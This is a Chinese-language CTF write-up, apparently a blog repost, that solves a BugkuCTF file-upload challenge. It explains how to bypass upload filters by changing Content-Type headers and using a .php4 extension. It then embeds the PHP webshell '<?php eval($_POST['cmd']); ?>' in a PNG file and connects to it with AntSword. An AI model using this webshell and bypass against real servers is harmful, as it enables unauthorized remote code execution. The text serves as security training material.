当前位置: 首页 > news >正文

bugkuctf-web-文件上传(kali操作)

一、题目描述:

二、启动场景

My name is margin,give me a image file not a php

可以上传图片但不可以上传php文件,说明存在三个过滤:

  • 请求头部的 Content-Type
  • 文件后缀
  • 请求数据的Content-Type

三、解题流程

1、上传文件就想到可以用burpsuite抓包修改数据,先在本地找个截图上传(建议截图小一点,一小块就行),点击submit的时候开始抓包,并右键选择send to repeat送到repeat模块

2.修改请求头

请求头部的 Content-Type 内容 随便改个大写字母过滤掉 比如 mulTipart/form-data
所上传的文件后缀 改为 .php4
请求数据的Content-Type 内容改为 image /jpeg

在PNG文件末尾添加一句木马:<?php eval($_POST['cmd']); ?>

3.重新发送请求后的数据

数据修改好后点击send发送,会显示4.打开蚁剑进行连接

右键点击添加数据,注意URL地址不要有额外的参数(只有IP地址和bp返回的链接),密码是木马里面的参数,这里是cmd。最后最后最后,一定记得点添加!!!

5.找flag

双击进入,回到根目录,找到flag,双击打开即可获得四、声明

这篇文章是我首次所创,格式不太美观请将就一下,主要是因为我看其他人的答题心得对新手来说(别问我咋看出来的,我就是新手)不太容易理解和操作,所以就结合一些他们的心得进行创作。

http://www.rkmt.cn/news/1429817.html

相关文章:

  • 实习19-HRM
  • windows 常见的cmd备忘录
  • 从Remy到3D空间影像壁纸,鸿蒙3DGS的差异性体验,凭什么得到消费者的认可?
  • 「斯隆奖」得主戴亮全职加盟复旦
  • 终极键盘连击修复指南:Keyboard Chatter Blocker 专业防抖工具完全教程
  • 【多模态评测】图生文/文生图模型怎么测?多模态评测集 CLIP Score 介绍
  • AI工具学习不是学软件,而是重构工作流:1套可迁移能力框架+5类岗位适配方案
  • Linux权限进阶:从passwd命令到SUID/SGID,搞懂那些‘s’和‘t’到底怎么用
  • 如何告别图片格式烦恼?Save Image as Type让网页图片一键转换
  • 如何快速修改暗黑破坏神2存档:5分钟掌握d2s-editor完整使用指南
  • FanControl深度解析:Windows风扇控制从入门到精通的完整指南
  • Python 潮流周刊#152:编程智能体终于跨过质量门槛了?
  • 网盘直链下载助手:告别限速,解锁九大网盘高速下载方案
  • 为什么你的芯片离不开它?聊聊带隙基准在LDO、ADC里的那些事儿
  • Liquid AI 发布 LFM2.5-8B-A1B:38T 训练的 8B 稀疏 MoE 模型,128K 上下文,笔记本就能跑
  • 闽侯经济纠纷律师评测推荐:从胜诉实绩看服务靠谱度 - 速递信息
  • AI技能化落地:从对话式大模型到可生产、可复用的AI工程体系
  • MTKClient核心技术深度解析:联发科设备底层调试与修复实战指南
  • 如何从平台依赖者转变为数据主权者:WeChatMsg重塑你的数字记忆管理方式
  • 2026 年 Q2 江汉区空调回收公司排名:本地 TOP5 靠谱推荐及其电话 - 武汉宅到家
  • IFC文件除了在线预览,还能免费转成STL/OBJ?这个工具一步搞定
  • 【基础知识】Python入门:集合
  • 神奇的内存管家:Mem Reduct如何让你的Windows电脑重获新生
  • 2026 年中国 AI 创业风向转变:零一万物、百川智能转型,下半场聚焦产品与生存
  • 190、运动控制中的行业应用:半导体设备(晶圆搬运)
  • 踩坑实录:Win11系统下为Jupyter配置MATLAB内核,我遇到的3个报错及解决办法
  • 27考研杨攀|任燕翔|卢欣粉笔101公共课全程班网课讲义PDF
  • 告别资源焦虑:用USB转接芯片CH347在安卓电视盒上DIY一个多功能调试工具(SPI/I2C/GPIO监控与编程)
  • Go2 ROS2 SDK架构揭秘:构建四足机器人的分布式智能控制系统
  • 183、运动控制中的行业应用:工业机器人(六轴)